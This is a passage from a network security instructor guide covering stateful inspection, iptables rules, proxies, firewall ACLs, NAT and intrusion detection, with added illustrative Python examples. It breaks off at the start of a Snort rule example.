A stateful inspection firewall addresses these problems by tracking information about
the session established between two hosts, or blocking malicious attempts to start a
bogus session. The vast majority of firewalls now incorporate some level of stateful
inspection capability. Session data is stored in a state table. When a packet arrives, the
firewall checks it to confirm whether it belongs to an existing connection. If it does not,
it applies the ordinary packet filtering rules to determine whether to allow it. Once the
connection has been allowed, the firewall usually allows traffic to pass unmonitored, in
order to conserve processing effort.

State table in the pfSense firewall appliance. (Screenshot used with permission
from Rubicon Communications, LLC.)

Stateful inspection can occur at two layers: transport and application.

Transport Layer (OSI Layer 4)

At the transport layer, the firewall examines the TCP three-way handshake to
distinguish new from established connections. A legitimate TCP connection should
follow a SYN > SYN/ACK > ACK sequence to establish a session, which is then tracked
using sequence numbers. Deviations from this, such as SYN without ACK or sequence
number anomalies, can be dropped as malicious flooding or session hijacking
attempts. The firewall can be configured to respond to such attacks by blocking source
IP addresses and throttling sessions. It can also track UDP connections, though this
is harder as UDP is a connectionless protocol. It is also likely to be able to detect IP
header and ICMP anomalies.
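The transport-layer tracking just described can be shown as a small state machine. This Python class is an added example, not code from the guide or from any firewall product: it keeps a state table keyed by the initiator's 4-tuple, enforces the SYN > SYN/ACK > ACK order, lets established traffic through without further checks, and throttles a source that accumulates too many half-open sessions. The limit value, IP addresses and ports are constructed; sequence number tracking and RST handling are omitted for brevity.

```python
from collections import defaultdict

SYN_SENT, SYN_RECEIVED, ESTABLISHED = "SYN_SENT", "SYN_RECEIVED", "ESTABLISHED"


class StatefulInspector:
    """Transport-layer state tracking for TCP.

    Each session is keyed by its 4-tuple from the initiator's side. Packets must
    follow SYN > SYN/ACK > ACK; anything else is dropped and logged. A per-source
    cap on half-open sessions throttles SYN flooding.
    """

    def __init__(self, half_open_limit=3):
        self.table = {}                      # initiator 4-tuple -> state
        self.half_open = defaultdict(int)    # source IP -> sessions not yet established
        self.half_open_limit = half_open_limit
        self.log = []                        # (4-tuple, reason) for every drop

    def inspect(self, src, sport, dst, dport, flags):
        """flags is a set of TCP flag names. Returns 'ALLOW' or 'DROP'."""
        fwd = (src, sport, dst, dport)       # key if this packet is from the initiator
        rev = (dst, dport, src, sport)       # key if this packet is from the responder

        if flags == {"SYN"}:
            if fwd in self.table:
                return self._drop(fwd, "repeated SYN on tracked session")
            if self.half_open[src] >= self.half_open_limit:
                return self._drop(fwd, "half-open limit exceeded (SYN flood?)")
            self.table[fwd] = SYN_SENT
            self.half_open[src] += 1
            return "ALLOW"

        if flags == {"SYN", "ACK"}:
            # Only valid as the responder's reply to a SYN we have already seen.
            if self.table.get(rev) == SYN_SENT:
                self.table[rev] = SYN_RECEIVED
                return "ALLOW"
            return self._drop(fwd, "SYN/ACK without matching SYN")

        if "ACK" in flags:
            if self.table.get(fwd) == SYN_RECEIVED:
                self.table[fwd] = ESTABLISHED
                self.half_open[src] -= 1
                return "ALLOW"
            if ESTABLISHED in (self.table.get(fwd), self.table.get(rev)):
                return "ALLOW"               # established traffic passes unmonitored
            return self._drop(fwd, "ACK for unknown session")

        return self._drop(fwd, f"unexpected flags {sorted(flags)}")

    def _drop(self, key, reason):
        self.log.append((key, reason))
        return "DROP"
```

The two failure modes in the text map directly onto the drop reasons: a stray SYN/ACK or ACK that matches no table entry is a session hijacking or scanning attempt, and a source whose SYNs never complete trips the half-open limit, which is the throttling behaviour described above.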


pfSense firewall rule configuration. Advanced settings allow maximums for states and
connections to be applied. (Screenshot used with permission from pfsense.org.)

Application Layer (OSI Layer 7)

An application-aware firewall can inspect the contents of packets at the application
layer. One key feature is to verify the application protocol matches the port (to verify
that malware isn't sending raw TCP data over port 80 just because port 80 is open,
for instance). As another example, a web application firewall could analyze the HTTP
headers and the HTML code present in HTTP packets to try to identify code that
matches a pattern in its threat database. Application-aware firewalls have many
different names, including application layer gateway, stateful multilayer inspection,
or deep packet inspection. Application-aware devices have to be configured with
separate filters for each type of traffic (HTTP and HTTPS, SMTP/IMAP, FTP, and
so on). Application-aware firewalls are very powerful, but they are not invulnerable.
Their very complexity means that it is possible to craft DoS attacks against exploitable
vulnerabilities in the firewall firmware. Also, the firewall cannot examine encrypted
data packets, unless configured with an SSL/TLS inspector.

Show Slide(s): iptables

iptables

Teaching Tip: iptables is referenced in Network+, but not in Security+, so we include
it here as a recap. If students have not completed Network+, make sure they know the
basics of how it operates and how to read the output.

iptables is a command line utility provided by many Linux distributions that allows
administrators to edit the rules enforced by the Linux kernel firewall (linux.die.net/
man/8/iptables). iptables works with chains, which apply to the different types of
traffic, such as the INPUT chain for traffic destined for the local host. Each chain has
a default policy set to DROP or ALLOW traffic that does not match a rule. Each rule,
processed in order, determines whether traffic matching the criteria is allowed or
dropped.

The command iptables --list INPUT --line-numbers -n will show
the contents of the INPUT chain with line numbers and no name resolution. The rules
in the following example drop any traffic from the specific host at 10.1.0.192 and allow


ICMP echo requests (pings), DNS, and HTTP/HTTPS traffic either from the local subnet
(10.1.0.0/24) or from any network (0.0.0.0/0):

Chain INPUT (policy DROP)
# target prot opt source destination
1 DROP all -- 10.1.0.192 0.0.0.0/0
2 ACCEPT icmp -- 10.10.0.0/24 0.0.0.0/0 icmptype 8
3 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53
4 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53
5 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:80
6 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:443
7 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED

The destination 0.0.0.0/0 means anywhere. When set on the INPUT chain, the effect
is to match any IP address that the local host is currently using. The ctstate rule is
a stateful rule that allows any traffic that is part of an established or related session.
As established connections should already have been allowed, this reduces processing
requirements to minimize impact on traffic flow.

The following command will insert a new rule as line 2 to allow traffic to the server
TCP port 22 from the local subnet:

iptables -I INPUT 2 -p tcp -s 10.1.0.0/24 --dport 22 -j ACCEPT

Different switches can be used to append (-A), delete (-D), or replace (-R) rules.

Show Slide(s): Firewall Implementation
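Because the objective for this topic is to be able to interpret firewall ACLs, it helps to see how a listing like the one above is actually evaluated: first match wins, the chain policy applies when nothing matches, and inserting a rule at position 2 shifts everything below it. The following Python script is an added example rather than code from the guide or the iptables project; it parses the INPUT chain listing shown above (embedded verbatim) into rule objects, evaluates constructed packets against it, and reproduces the effect of the -I INPUT 2 command. It models only the match fields that appear in the listing (protocol, source, destination, dpt, icmptype, ctstate) and is not a full iptables emulator.

```python
import ipaddress

# The INPUT chain listing from the text, embedded as the parser's input.
LISTING = """Chain INPUT (policy DROP)
# target prot opt source destination
1 DROP all -- 10.1.0.192 0.0.0.0/0
2 ACCEPT icmp -- 10.10.0.0/24 0.0.0.0/0 icmptype 8
3 ACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:53
4 ACCEPT tcp -- 0.0.0.0/0 0.0.0.0/0 tcp dpt:53
5 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:80
6 ACCEPT tcp -- 10.1.0.0/24 0.0.0.0/0 tcp dpt:443
7 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 ctstate RELATED,ESTABLISHED
"""


class Rule:
    """One chain entry. Only the match options present in the listing are modelled."""

    def __init__(self, target, prot, source, dest, extra=""):
        self.target, self.prot = target, prot
        self.source = ipaddress.ip_network(source if "/" in source else source + "/32")
        self.dest = ipaddress.ip_network(dest if "/" in dest else dest + "/32")
        self.dport = self.icmptype = None
        self.ctstates = set()
        tokens = extra.split()
        for i, tok in enumerate(tokens):
            if tok.startswith("dpt:"):
                self.dport = int(tok[4:])
            elif tok == "icmptype":
                self.icmptype = int(tokens[i + 1])
            elif tok == "ctstate":
                self.ctstates = set(tokens[i + 1].split(","))

    def matches(self, pkt):
        """pkt keys: proto, src, dst and optionally dport, icmptype, ctstate."""
        if self.prot != "all" and self.prot != pkt["proto"]:
            return False
        if ipaddress.ip_address(pkt["src"]) not in self.source:
            return False
        if ipaddress.ip_address(pkt["dst"]) not in self.dest:
            return False
        if self.dport is not None and pkt.get("dport") != self.dport:
            return False
        if self.icmptype is not None and pkt.get("icmptype") != self.icmptype:
            return False
        if self.ctstates and pkt.get("ctstate") not in self.ctstates:
            return False
        return True


class Chain:
    def __init__(self, policy):
        self.policy = policy
        self.rules = []

    @classmethod
    def parse(cls, listing):
        lines = [ln for ln in listing.strip().splitlines() if ln.strip()]
        chain = cls(lines[0].split("(policy ")[1].rstrip(")"))
        for line in lines[1:]:
            if line.startswith("#") or line.startswith("num"):
                continue                       # column header line
            p = line.split()                   # num target prot opt source dest [extra...]
            chain.rules.append(Rule(p[1], p[2], p[4], p[5], " ".join(p[6:])))
        return chain

    def insert(self, position, rule):
        """Equivalent of `iptables -I INPUT <position> ...` (1-based, later rules shift down)."""
        self.rules.insert(position - 1, rule)

    def evaluate(self, pkt):
        """First matching rule decides; otherwise the chain policy. Returns (verdict, rule_no)."""
        for number, rule in enumerate(self.rules, start=1):
            if rule.matches(pkt):
                return rule.target, number
        return self.policy, None


if __name__ == "__main__":
    chain = Chain.parse(LISTING)
    ssh = {"proto": "tcp", "src": "10.1.0.5", "dst": "10.1.0.1", "dport": 22}
    print("before insert:", chain.evaluate(ssh))
    chain.insert(2, Rule("ACCEPT", "tcp", "10.1.0.0/24", "0.0.0.0/0", "tcp dpt:22"))
    print("after insert: ", chain.evaluate(ssh))
```

Two points worth checking with it: DNS from 10.1.0.192 is still dropped by rule 1 even though rule 3 would accept it, because order matters; and after the insert the blacklisted host still cannot reach port 22, since the new rule lands below rule 1.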
Firewall Implementation

Teaching Tip: Firewalls can be implemented in many different ways. They are often
implemented as a function within a product, as well as the dedicated security
appliances.

You should consider how the firewall is implemented as hardware or software, for
instance to cover a given placement or use on the network. Some types of firewalls
are better suited for placement at the network edge or zonal borders; others are
designed to protect individual hosts.

Interaction Opportunity: As with most of these security appliances, it is best to look at
the features of actual products, rather than depend too much on categorizations. Refer
students to vendor sites such as barracuda.com, checkpoint.com, fortinet.com, or
pfsense.org. Get students to visit one site per group and then compare features
supported by the different vendors.

Firewall Appliances

An appliance firewall is a stand-alone hardware firewall deployed to monitor traffic
passing into and out of a network zone. A firewall appliance can be deployed in two
ways:

• Routed (layer 3): the firewall performs forwarding between subnets. Each interface
on the firewall connects to a different subnet and represents a different security
zone.

• Bridged (layer 2): the firewall inspects traffic passing between two nodes, such
as a router and a switch. This is also referred to as transparent mode. The firewall
does not have an IP interface (except for configuration management). It bridges the
Ethernet interfaces between the two nodes. Despite performing forwarding at layer
2, the firewall can still inspect and filter traffic on the basis of the full range of packet
headers. The typical use case for a transparent firewall is to deploy it without having
to reconfigure subnets and reassign IP addresses on other devices.


Cisco ASA (Adaptive Security Appliance) ASDM (Adaptive Security Device Manager) interface.
(Screenshot used with permission from Cisco.)

A router firewall or firewall router appliance implements filtering functionality as part
of the router firmware. The difference is that a router appliance is primarily designed
for routing, with firewall as a secondary feature. Internet router/modems come
with a firewall built in, for example.

Application-Based Firewalls

Firewalls can also run as software on any type of computing host. There are several
types of application-based firewalls:

• Host-based firewall (or personal firewall): implemented as a software
application running on a single host designed to protect that host only. As well as
enforcing packet filtering ACLs, a personal firewall can be used to allow or deny
software processes from accessing the network.

• Application firewall: software designed to run on a server to protect a particular
application only (a web server firewall, for instance, or a firewall designed to protect
an SQL Server database). This is a type of host-based firewall and would typically be
deployed in addition to a network firewall.

• Network operating system (NOS) firewall: a software-based firewall running
under a network server OS, such as Windows or Linux. The server would function as
a gateway or proxy for a network segment.

Show Slide(s): Proxies and Gateways

Proxies and Gateways

Teaching Tip: Point out that many proxy servers are used to implement application
layer firewalls, but they can also improve client performance (through a caching
engine).

A firewall that performs application layer filtering is likely to be implemented as a
proxy. Where a network firewall only accepts or blocks traffic, a proxy server works
on a store-and-forward model. The proxy deconstructs each packet, performs analysis,
then rebuilds the packet and forwards it on, providing it conforms to the rules.


The amount of rebuilding depends on the proxy. Some proxies may only manipulate the
IP and TCP headers. Application-aware proxies might add or remove HTTP headers. A deep
packet inspection proxy might be able to remove content from an HTTP payload.

Forward Proxy Servers

A forward proxy provides for protocol-specific outbound traffic. For example, you
might deploy a web proxy that enables client computers on the LAN to connect to
websites and secure websites on the Internet. This is a forward proxy that services TCP
ports 80 and 443 for outbound traffic.

Configuring content filter settings for the Squid proxy server (squid-cache.org) running on pfSense.
The filter can apply ACLs and time-based restrictions, and use blacklists to prohibit access to URLs.
(Screenshot used with permission from Rubicon Communications, LLC.)

The main benefit of a proxy is that client computers connect to a specified point on
the perimeter network for web access. The proxy can be positioned within a DMZ.
This provides for a degree of traffic management and security. In addition, most web
proxy servers provide caching engines, whereby frequently requested web pages
are retained on the proxy, negating the need to re-fetch those pages for subsequent
requests.

A proxy server must understand the application it is servicing. For example, a web
proxy must be able to parse and modify HTTP and HTTPS commands (and potentially
HTML and scripts too). Some proxy servers are application-specific; others are
multipurpose. A multipurpose proxy is one configured with filters for multiple protocol
types, such as HTTP, FTP, and SMTP.

Proxy servers can generally be classed as non-transparent or transparent.

• A non-transparent proxy means that the client must be configured with the proxy
server address and port number to use it. The port on which the proxy server
accepts client connections is often configured as port 8080.

• A transparent (or forced or intercepting) proxy intercepts client traffic without
the client having to be reconfigured. A transparent proxy must be implemented on a
switch or router or other inline network appliance.


Configuring transparent proxy settings for the Squid proxy server (squid-cache.org) running on pfSense. (Screenshot used with permission from Rubicon Communications, LLC.)

Both types of proxy can be configured to require users to be authenticated before allowing access. The proxy is likely to be able to use SSO to do this without having to prompt the user for a password.

A proxy autoconfiguration (PAC) script allows a client to configure proxy settings without user intervention. The Web Proxy Autodiscovery (WPAD) protocol allows browsers to locate a PAC file. This can be an attack vector, as a malicious proxy on the local network can be used to obtain the user's hash as the browser tries to authenticate (nopsec.com/responder-beyond-wpad).

Reverse Proxy Servers


A reverse proxy server provides for protocol-specific inbound traffic. For security purposes, you might not want external hosts to be able to connect directly to application servers, such as web, email, and VoIP servers. Instead, you can deploy a reverse proxy on the network edge and configure it to listen for client requests from a public network (the Internet). The proxy applies filtering rules and, if accepted, it creates the appropriate request for an application server within a DMZ. In addition, some reverse proxy servers can handle application-specific load balancing, traffic encryption, and caching, reducing the overhead on the application servers.

Show Slide(s): Access Control Lists

Access Control Lists

Firewall access control lists (ACLs) are configured on the principle of least access. This is the same as the principle of least privilege: only allow the minimum amount of traffic required for the operation of valid network services and no more. The rules in a firewall's ACL are processed top-to-bottom. If traffic matches one of the rules, then it is allowed to pass; consequently, the most specific rules are placed at the top. The final default rule is typically to block any traffic that has not matched a rule (implicit deny). If the firewall does not have a default implicit deny rule, an explicit deny all rule can be added manually to the end of the ACL.

Teaching Tip: Emphasize firewall rule processing and the concept of implicit deny.


Sample firewall ruleset configured on pfSense. This ruleset blocks all traffic from bogon networks and a specific private address range but allows any HTTP, HTTPS, or SMTP traffic from any other source. (Screenshot used with permission from Rubicon Communications, LLC.)

Each rule can specify whether to block or allow traffic based on several parameters, often referred to as tuples. If you think of each rule being like a row in a database, the tuples are the columns. For example, in the previous screenshot, the tuples include Protocol, Source (address), Source Port, Destination (address), Destination Port, and so on.

Even the simplest packet filtering firewall can be complex to configure securely. It is essential to create a written policy describing what a filter ruleset should do and to test the configuration as far as possible to ensure that the ACLs you have set up work as intended. Also test and document changes made to ACLs. Some other basic principles include:

• Block incoming requests from internal or private IP addresses (that have obviously been spoofed).

• Block incoming requests from protocols that should only be functioning at a local network level, such as ICMP, DHCP, or routing protocol traffic.

• Use penetration testing to confirm the configuration is secure. Log access attempts and monitor the logs for suspicious activity.

• Take the usual steps to secure the hardware on which the firewall is running and the use of the management interface.
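The rule processing described above (tuples, top-to-bottom first match, implicit deny, spoofed private sources blocked first), as an added example written for this page rather than taken from the guide or from pfSense's rule engine. The ruleset mirrors the screenshot's intent: private-source packets arriving on the WAN are dropped, ICMP is kept local, and only HTTP, HTTPS and SMTP to specific servers are allowed. Server addresses use the 203.0.113.0/24 documentation range and are constructed.

```python
"""Added example: first-match ACL evaluation with implicit deny.

Illustrative code, not pfSense's rule engine. It models the tuples shown
in the screenshot (protocol, source, source port, destination, destination
port) and the processing order described in the text: rules are tried top
to bottom, the first match decides, and anything that matches no rule is
dropped (implicit deny). Addresses and rules are constructed.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

ANY = None  # wildcard for any tuple field


@dataclass(frozen=True)
class Rule:
    action: str                     # "allow" or "block"
    proto: Optional[str] = ANY      # "tcp", "udp", "icmp" or ANY
    src: Optional[str] = ANY        # CIDR or ANY
    sport: Optional[int] = ANY
    dst: Optional[str] = ANY
    dport: Optional[int] = ANY
    comment: str = ""

    def matches(self, proto, src, sport, dst, dport) -> bool:
        def in_net(addr, cidr):
            return cidr is ANY or ipaddress.ip_address(addr) in ipaddress.ip_network(cidr)
        return ((self.proto is ANY or self.proto == proto)
                and in_net(src, self.src)
                and (self.sport is ANY or self.sport == sport)
                and in_net(dst, self.dst)
                and (self.dport is ANY or self.dport == dport))


# RFC 1918 ranges: a packet arriving on the WAN interface that claims one of
# these as its source is spoofed, so these most specific rules sit on top.
PRIVATE_NETS = ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"]

WAN_INBOUND: List[Rule] = [
    *[Rule("block", src=net, comment="spoofed private source") for net in PRIVATE_NETS],
    Rule("block", proto="icmp", comment="ICMP should stay local"),
    Rule("allow", proto="tcp", dst="203.0.113.10", dport=80, comment="HTTP to web server"),
    Rule("allow", proto="tcp", dst="203.0.113.10", dport=443, comment="HTTPS to web server"),
    Rule("allow", proto="tcp", dst="203.0.113.25", dport=25, comment="SMTP to mail server"),
    # No explicit final rule: evaluate() applies the implicit deny. If the
    # firewall lacked one, Rule("block", comment="explicit deny all") goes here.
]


def evaluate(rules: List[Rule], proto, src, sport, dst, dport) -> str:
    """Return the action of the first matching rule, or "block" (implicit deny)."""
    for rule in rules:
        if rule.matches(proto, src, sport, dst, dport):
            return rule.action
    return "block"
```

Because evaluation stops at the first match, swapping the order of the spoof-block rules and the allow rules would let a spoofed 10.0.0.0/8 source reach the web server on port 443; this is the reason the text places the most specific rules at the top, and it is the kind of ordering mistake that the written policy and testing it recommends are meant to catch.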
Show Slide(s): Network Address Translation

Network Address Translation

Network address translation (NAT) was devised as a way of freeing up scarce IP addresses for hosts needing Internet access. A private network will typically use a private addressing scheme to allocate IP addresses to hosts. These addresses can be drawn from one of the pools of addresses defined in RFC 1918 (tools.ietf.org/html/rfc1918) as non-routable over the Internet:

• 10.0.0.0 to 10.255.255.255 (Class A private address range).

• 172.16.0.0 to 172.31.255.255 (Class B private address range).

• 192.168.0.0 to 192.168.255.255 (Class C private address range).

Teaching Tip: Make sure students can identify private address ranges. Stress that NAT is not a security mechanism without combining it with traffic filters.

A NAT gateway is a service that translates between the private addressing scheme used by hosts on the LAN and the public addressing scheme used by the router, firewall, or proxy server on the network edge. NAT provides security in the sense that it can manage ingress and egress traffic at well-defined points on the network edge, but it is important to realize that it does not perform a filtering function.

There are several types of NAT:

• Static and dynamic source NAT perform mappings between private (inside local) network addresses and public (inside global) addresses. These mappings can be static or dynamically assigned.

• Overloaded NAT/Network Address Port Translation (NAPT)/Port Address Translation (PAT) provides a means for multiple private IP addresses to be mapped onto a single public address. For example, say two hosts on the LAN initiate a web connection at the same time. The NAPT service creates two new port mappings for these requests, one unique source port for each host. It then substitutes the private IPs for the public IP and forwards the requests to the public Internet. It performs a reverse mapping on any traffic returned using those ports, inserting the original IP address and port number, and forwards the packets to the internal hosts.

NAT overloading. (Image © 123RF.com.)

• Destination NAT/port forwarding uses the router's public address to publish a web service, but forwards incoming requests to a different IP. Port forwarding means that the router takes requests from the Internet for a particular application (say, HTTP port 80) and sends them to a designated host and port in the DMZ or LAN.
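The NAPT port-mapping and reverse-mapping process, together with destination NAT for a published service, as an added example (illustrative code written for this page, not code from the guide or from any router vendor). The public address is taken from the 203.0.113.0/24 documentation range and the internal addresses are constructed; 10.1.0.10 reuses the host from the port-forwarding screenshot.

```python
"""Added example: a NAPT/PAT translation table.

Not code from the guide or from any router vendor. Two LAN hosts share one
public address: each outbound flow is given a unique public source port,
replies are reverse-mapped through that port, and publish() shows
destination NAT (port forwarding) for an internal server. Addresses are
constructed (RFC 1918 inside, documentation ranges outside).
"""
from typing import Dict, Optional, Tuple

Endpoint = Tuple[str, int]   # (IP address, port)


class NaptGateway:
    def __init__(self, public_ip: str, first_port: int = 61000):
        self.public_ip = public_ip
        self._next_port = first_port
        self._outbound: Dict[Endpoint, int] = {}    # private endpoint -> public port
        self._inbound: Dict[int, Endpoint] = {}     # public port -> private endpoint

    def translate_outbound(self, src: Endpoint) -> Endpoint:
        """Rewrite a LAN source endpoint to the public IP and a unique port."""
        if src not in self._outbound:
            while self._next_port in self._inbound:   # never reuse a published port
                self._next_port += 1
            port = self._next_port
            self._next_port += 1
            self._outbound[src] = port
            self._inbound[port] = src
        return self.public_ip, self._outbound[src]

    def translate_inbound(self, dst: Endpoint) -> Optional[Endpoint]:
        """Reverse-map a packet arriving from the Internet.

        Returns the private endpoint to deliver to, or None when no session
        or published service matches (the packet is then dropped). NAT only
        decides *where* to deliver; filtering what is allowed is the
        firewall's job, which is why NAT is not a security control by itself.
        """
        ip, port = dst
        if ip != self.public_ip:
            return None
        return self._inbound.get(port)

    def publish(self, public_port: int, inside: Endpoint) -> None:
        """Destination NAT/port forwarding: expose an internal service."""
        self._inbound[public_port] = inside
```

The same table serves both directions: the outbound mapping is what lets the reply find its way back, and an unsolicited packet to an unmapped port has nowhere to go. Once a port is published, however, anything reaching it is delivered to the inside host, so the published service needs its own ACL entry on the firewall.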


Configuring port forwarding on a pfSense firewall appliance. This rule forwards any HTTP traffic received on the appliance's WAN interface to the 10.1.0.10 host on the LAN. (Screenshot used with permission from pfsense.org.)

The larger IPv6 address space makes most use cases for NAT redundant. A host can use a link-local address to contact neighboring nodes, but any routed traffic should use a globally unique address. In IPv6 it is routing policies and firewall filtering that manage which hosts and networks are reachable. That said, there are mechanisms for translating prefixes at the network edge (NPTv6) and for translation between IPv6 addresses (NAT66) or IPv6 and IPv4 addresses (NAT64 and NAT46).

Show Slide(s): Virtual Firewalls

Virtual Firewalls

Virtual firewalls are usually deployed within data centers and cloud services. A virtual firewall can be implemented in three different ways:

• Hypervisor-based: this means that filtering functionality is built into the hypervisor or cloud provisioning tool. You can use the cloud's web app or application programming interface (API) to write access control lists (ACLs) for traffic arriving or leaving a virtual host or virtual network.

• Virtual appliance: this refers to deploying a vendor firewall appliance instance using virtualization, in the same way you might deploy a Windows or Linux guest OS.

• Multiple context: this refers to multiple virtual firewall instances running on a hardware firewall appliance. Each context has a separate interface and can perform a distinct filtering role.

While they can be deployed like regular firewalls for zone-based routing and filtering, virtual firewalls' most significant role is to support the east-west security and zero-trust microsegmentation design paradigms. They are able to inspect traffic as it passes from host to host or between virtual networks, rather than requiring that traffic be routed up to a firewall appliance and back.

Teaching Tip: Note that we will cover cloud security in more detail in another lesson.


Show Slide(s): Open-Source versus Proprietary Firewalls

Open-Source versus Proprietary Firewalls

The ability to inspect source code will be a requirement for high security environments that cannot rely on implicit trust when selecting vendors. The code underpinning appliance-based, software, and virtual firewalls can be developed as open-source or proprietary (or somewhere in between):

• Wholly proprietary: implemented as a proprietary OS, such as Cisco ASA, Juniper JunOS, PaloAlto PANOS, or Barracuda's Windows-based appliance.

• Mostly proprietary: developed from a Linux kernel, but with proprietary features added. Examples include Check Point IPSO, FortiGate FortiOS, and Sonicwall. Any code developed from a GPL source should be available, but in general terms these products cannot be used independently of a commercial contract with the vendor.

• Wholly open source: these can be used independently of the vendor, but the vendors typically have commercial appliances and support contracts too. Examples include pfSense and Smoothwall.

In determining whether to follow a self-installed versus supported deployment, as well as the core appliance code, you need to consider access to support, update availability, and access to subscription-based features, such as signatures and threat feeds.


Review Activity:
Firewalls and Proxy Servers

Answer the following questions:

1. True or False? As they protect data at the highest layer of the protocol stack, application-based firewalls have no basic packet filtering functionality.

False. All firewall types can perform basic packet filtering (by IP address, protocol type, port number, and so on).

2. What distinguishes host-based personal software firewall from a network firewall appliance?

Personal firewall software can block processes from accessing a network connection as well as applying filtering rules. A personal firewall protects the local host only, while a network firewall filters traffic for all hosts on the segment behind the firewall.

3. True or False? When deploying a non-transparent proxy, you must configure clients with the proxy address and port.

True.

4. What is usually the purpose of the default rule on a firewall?

Block any traffic not specifically allowed (implicit deny).

5. True or false? Static NAT means mapping a single public/external IP address to a single private/internal IP address.

True.


Topic 10B
Implement Network Security Monitoring

EXAM OBJECTIVES COVERED
3.3 Given a scenario, implement secure network designs

Intrusion detection and prevention systems are mature security technologies, widely deployed to monitor company networks. A large part of the monitoring and alerting data you will be analyzing will come from these systems, so it is important that you be able to install them to appropriate locations in the network and configure them correctly.

Teaching Tip: This topic looks at basic IDS solutions and at UTM or next-gen firewalls and secure web gateways.

Show Slide(s): Network-Based Intrusion Detection Systems

Network-Based Intrusion Detection Systems

An intrusion detection system (IDS) is a means of using software tools to provide real-time analysis of either network traffic or system and application logs. A network-based IDS (NIDS) captures traffic via a packet sniffer, referred to as a sensor. It analyzes the packets to identify malicious traffic and displays alerts to a console or dashboard.

A NIDS, such as Snort (snort.org), Suricata (suricata-ids.org), or Zeek/Bro (zeek.org), performs passive detection. When traffic is matched to a detection signature, it raises an alert or generates a log entry, but does not block the source host. This type of passive sensor does not slow down traffic and is undetectable by the attacker. It does not have an IP address on the monitored network segment.

A NIDS is used to identify and log hosts and applications and to detect attack signatures, password guessing attempts, port scans, worms, backdoor applications, malformed packets or sessions, and policy violations (ports or IP addresses that are not permitted, for instance). You can use analysis of the logs to tune firewall rulesets, remove or block suspect hosts and processes from the network, or deploy additional security controls to mitigate any threats you identify.

Teaching Tip: IDS has mostly developed into IPS and merged with firewall and anti-virus/antispyware software. The systems are not as limited by network and host bandwidth as they were a few years ago. From the perspective of the exam, however, you should stress the difference. It is certainly important to realize that a pure IDS will only provide a passive response.


Viewing an intrusion detection alert generated by Snort in the Kibana app on Security Onion. (Screenshot: Security Onion, securityonion.net.)

Show Slide(s): TAPs and Port Mirrors

TAPs and Port Mirrors

Typically, the packet capture sensor is placed inside a firewall or close to a server of particular importance. The idea is usually to identify malicious traffic that has managed to get past the firewall. A single IDS can generate a very large amount of logging and alerting data, so you cannot just put multiple sensors everywhere in the network without provisioning the resources to manage them properly. Depending on network size and resources, one or just a few sensors will be deployed to monitor key assets or network paths.

There are three main options for connecting a sensor to the appropriate point in the network:

• SPAN (switched port analyzer)/mirror port: this means that the sensor is attached to a specially configured port on the switch that receives copies of frames addressed to nominated access ports (or all the other ports). This method is not completely reliable. Frames with errors will not be mirrored and frames may be dropped under heavy load.

• Passive test access point (TAP): this is a box with ports for incoming and outgoing network cabling and an inductor or optical splitter that physically copies the signal from the cabling to a monitor port. There are types for copper and fiber optic cabling. Unlike a SPAN, no logic decisions are made, so the monitor port receives every frame (corrupt or malformed or not) and the copying is unaffected by load.

• Active TAP: this is a powered device that performs signal regeneration (again, there are copper and fiber variants), which may be necessary in some circumstances. Gigabit signaling over copper wire is too complex for a passive tap to monitor and some types of fiber links may be adversely affected by optical splitting. Because it performs an active function, the TAP becomes a point of failure for the links in the event of power loss. When deploying an active TAP, it is important to use a model with internal batteries or connect it to a UPS.

A TAP will usually output two streams to monitor a full-duplex link (one channel for upstream and one for downstream). Alternatively, there are aggregation TAPs, which rebuild the streams into a single channel, but these can drop frames under very heavy load.

Teaching Tip: Make sure students can distinguish between appropriate locations for sensors and the location of the collection/analysis engine.

Show Slide(s): Network-Based Intrusion Prevention Systems

Network-Based Intrusion Prevention Systems

Compared to the passive function of an IDS, an intrusion prevention system (IPS) can provide an active response to any network threats that it matches. One typical preventive measure is to end the TCP session, sending a TCP reset packet to the attacking host. Another option is for the IPS to apply a temporary filter on the firewall to block the attacker's IP address (shunning). Other advanced measures include throttling bandwidth to attacking hosts, applying complex firewall filters, and even modifying suspect packets to render them harmless. Finally, the appliance may be able to run a script or third-party program to perform some other action not supported by the IPS software itself.

Some IPS provide inline, wire-speed anti-virus scanning. Their rulesets can be configured to provide user content filtering, such as blocking URLs, applying keyword-sensitive block lists or allow lists, or applying time-based access restrictions.

IPS appliances are positioned like firewalls at the border between two network zones. As with proxy servers, the appliances are inline with the network, meaning that all traffic passes through them (also making them a single point of failure if there is no fault tolerance mechanism). This means that they need to be able to cope with high bandwidths and process each packet very quickly to avoid slowing down the network.

Teaching Tip: Make sure students understand inline placement and active response versus passive detection, alerting, and logging of threats.

Show Slide(s): Signature-Based Detection

Signature-Based Detection

In an IDS, the analysis engine is the component that scans and interprets the traffic captured by the sensor with the purpose of identifying suspicious traffic. The analysis engine determines how any given event should be classed, with typical options to ignore, log only, alert, and block (IPS). The analysis engine is programmed with a set of rules that it uses to drive its decision making process. There are several methods of formulating the ruleset.

Signature-based detection (or pattern-matching) means that the engine is loaded with a database of attack patterns or signatures. If traffic matches a pattern, then the engine generates an incident.

Snort rules file supplied by the open-source Emerging Threats community feed.

The signatures and rules (often called plug-ins or feeds) powering intrusion detection need to be updated regularly to provide protection against the latest threat types. Commercial software requires a paid-for subscription to obtain the updates. It is important to ensure that the software is configured to update only from valid repositories, ideally using a secure connection method, such as HTTPS.

Teaching Tip: While we don't go into detail on Snort/Suricata rules, make sure students can identify the general format.
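The general format of a Snort/Suricata rule and how a signature engine applies it, as an added example written for this page (it is not Snort's or Suricata's parser, and handles only a small subset of the syntax: the header `action protocol src sport -> dst dport` and the `msg`, `content`, `sid` and `rev` options). The variable values, the two policy rules and the packets they are checked against are constructed for the example.

```python
"""Added example: the general format of a Snort/Suricata rule and a toy
signature engine that applies it.

A toy parser for a small subset of the rule syntax, not Snort's engine.
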